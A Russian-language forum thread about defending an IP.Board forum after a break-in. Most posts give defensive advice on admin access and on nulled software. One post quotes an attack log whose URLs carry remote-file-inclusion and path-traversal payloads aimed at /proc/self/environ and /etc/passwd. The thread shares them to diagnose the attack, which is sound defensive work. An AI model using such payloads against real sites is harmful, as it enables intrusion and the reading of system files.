Опубликовано: 3 апреля 201114 г Помогите пожалуйста защитится от хакинга.Сосбтвенно адрес _http://help-icq.ru
Опубликовано: 3 апреля 201114 г Дырки есть в любом проекте, так что самое первое и основное что можно и нужно сделать - это поменять путь к админке, и защитить ее методом .htpasswd
Опубликовано: 3 апреля 201114 г Помогите пожалуйста защитится от хакинга.Использовать нормальный хостинг. Не использовать нуленные программы. Если в непонятно откуда скачанных DLE или в IP.Board - е уже предусмотрен черный ход, то не защитится уже не чем. Хуки скачивать только с официальных сайтов. Взломов через хуки еще не видел, но возможность вполне вероятная. Ну естественно следить за обновлением используемых официальных программ. И все. Сломать нормальный пропаченный IP.Board очень сложно.
Опубликовано: 3 апреля 201114 г Автор Дырки есть в любом проекте, так что самое первое и основное что можно и нужно сделать - это поменять путь к админке, и защитить ее методом .htpasswdМожно подробнее про .htpasswd?
Опубликовано: 3 апреля 201114 г Можно подробнее про .htpasswdAuth - защита паролем - но мертвому припарка. IPS после 2.3 про такую защиту забыла. Эффекта он нее не много. Если форум дырявый, я прямыми запросами к базе данных его положу, без захода в АЦ. Если хостер дырявый, то .htpasswd и .htacces стираются без проблем. Если взлом по ftp, то в АЦ заходов не бывает.
Опубликовано: 3 апреля 201114 г Автор Auth - защита паролем - но мертвому припарка. IPS после 2.3 про такую защиту забыла. Эффекта он нее не много. Если форум дырявый, я прямыми запросами к базе данных его положу, без захода в АЦ. Если хостер дырявый, то .htpasswd и .htacces стираются без проблем. Если взлом по ftp, то в АЦ заходов не бывает.Вродебы там всё намного проще.Я сейчас посмотрел логи входа в админку.Походу тот кто напакостил узнал пароль админа (второго) и через его акк всё сделал.Так как мой акк был удалён, а его нет.так что админку защитить я считаю имеет смысл.
Опубликовано: 3 апреля 201114 г Походу тот кто напакостил узнал пароль админа (второго) и через его акк всё сделал.Узнать пароль к htpasswd так же можно. Так как мой акк был удалён, а его нет.так что админку защитить я считаю имеет смысл.Это ложное ощущение безопасности. Но лишняя защита не когда не бывает лишней. Хотя проще, ограничить по минимуму количество людей с доступом в АЦ.Пароль должен быть реально сложный. У админа "логин" и "отображаемое имя" никогда не должны совпадать. Я не использую htpasswd. Так как мой акк был удалён, а его нет.А смысл его при взломе, было оставлять? Чтобы восстановить было проще?
Опубликовано: 3 апреля 201114 г Автор Я ведь не сказал "тему можно удалить".Тема ведь останется. А если у кого-то будет похожий вопрос то создаст новую...
Опубликовано: 3 апреля 201114 г Самое неприятное в любом взломе - это не факт самого взлома, а неизвестность:- Кто и как именно взломал?- Какой уровень доступа получил?- С какой целью?- Что именно и в каком количестве сделано?- Не оставлено ли закладок "на будущее"? Не найдя точные достоверные ответы, нельзя гарантировать, что взлом не повторится вновь. Если хотя бы на один из вопросов ответа нет - проводить полный аудит безопасности всего и вся, долго и основательно. С сабжевого форума поржал.
Опубликовано: 4 апреля 201114 г проводить полный аудит безопасности Смысл? Если с самого начала была высокая вероятность закладки.
Опубликовано: 4 апреля 201114 г А я и не про этот форум пишу. Топикстартер тут и не появится более, скорее всего, он же свою проблему "решил". А там у него - да, конечно, проверять смысла нет. Судя по всему, пиратская говносборка какого-то очередного "хакера", изначально напичканная левыми модами и правками. Да и сам форум такой форум - такая тематика, такой контент. В одной из тех с половиной тем, кажется, сам админ выкладывает т.н. "пинч" - генератор трояна, ворующего cookies, причем выкладывает в бинарном виде. Думаю, вы все понимаете и относительно форума, и относительно методики "взлома"? Тут и "закаладки" не нужны, с такими админами))
Опубликовано: 5 апреля 201114 г День добрый. Сегодня ночью посыпались ошибки следующего вида. Кто-то очень хотел найти какую-то уязвимость или что-то еще? Что за параметр "k"? Кто может прокомментировать? Спасибо. Выдержки из лога. Всего было 108 строк. Полный лог во вложении. log_id log_member log_date log_error log_error_code log_ip_address log_request_uri18 0 1301948884 Очистить cookies не удалось. Ссылка «Очистить cookies» имеет неверный формат. Пожалуйста, вернитесь назад и попробуйте еще раз.<br /><br /> 2010 84.20.133.65 /index.php?app=core&module=global§ion=login&do=deleteCookies&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif?19 0 1301948886 Очистить cookies не удалось. Ссылка «Очистить cookies» имеет неверный формат. Пожалуйста, вернитесь назад и попробуйте еще раз.<br /><br /> 2010 84.20.133.65 /index.php?app=core&module=global§ion=login&do=deleteCookies&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif%0020 0 1301948886 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile§ion=status&do=unlockStatus&status_id=32&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif?21 0 1301948888 Очистить cookies не удалось. Ссылка «Очистить cookies» имеет неверный формат. Пожалуйста, вернитесь назад и попробуйте еще раз.<br /><br /> 2010 84.20.133.65 /index.php?app=core&module=global§ion=login&do=deleteCookies&k=/proc/self/environ22 0 1301948888 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile§ion=status&do=unlockStatus&status_id=32&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif%0023 0 1301948888 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile§ion=status&do=lockStatus&status_id=32&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif?24 0 1301948889 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile§ion=status&do=unlockStatus&status_id=30&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif?25 0 1301948889 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile§ion=status&do=lockStatus&status_id=30&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif?26 0 1301948890 Очистить cookies не удалось. Ссылка «Очистить cookies» имеет неверный формат. Пожалуйста, вернитесь назад и попробуйте еще раз.<br /><br /> 2010 84.20.133.65 /index.php?app=core&module=global§ion=login&do=deleteCookies&k=/proc/self/environ%0027 0 1301948890 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile§ion=status&do=unlockStatus&status_id=32&k=/proc/self/environ28 0 1301948890 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile§ion=status&do=lockStatus&status_id=32&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif%0029 0 1301948891 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile§ion=status&do=unlockStatus&status_id=30&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif%0030 0 1301948891 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile§ion=status&do=lockStatus&status_id=30&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif%0031 0 1301948891 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile§ion=status&do=unlockStatus&status_id=32&k=/proc/self/environ%0032 0 1301948892 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile§ion=status&do=lockStatus&status_id=30&k=/proc/self/environ33 0 1301948892 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile§ion=status&do=unlockStatus&status_id=28&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif? ... 123 0 1301948950 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile§ion=status&do=unlockStatus&status_id=32&k=/../../../../../../../../../../etc/passwd124 0 1301948952 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile§ion=status&do=unlockStatus&status_id=32&k=../../../../../../../../../../etc/passwd%00125 0 1301948954 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile§ion=status&do=unlockStatus&status_id=32&k=/../../../../../../../../../../etc/passwd%00error_logs.rar
Опубликовано: 5 апреля 201114 г 'k' - это параметр, использующийся для валидации форм. Он проверяется в дюжине файлов, но всегда в такой:if ( $this->request['k'] != $this->member->form_hash )или в такой форме:if ( $this->request['k'] == $this->member->form_hash Эта форма абсолютно безопасна, поэтому вариантов всего два:а) на каком-то из нулей на эту переменную привязан шелл;б) какой-то наивный школьник балуется.
Помогите пожалуйста защитится от хакинга.
Сосбтвенно адрес _http://help-icq.ru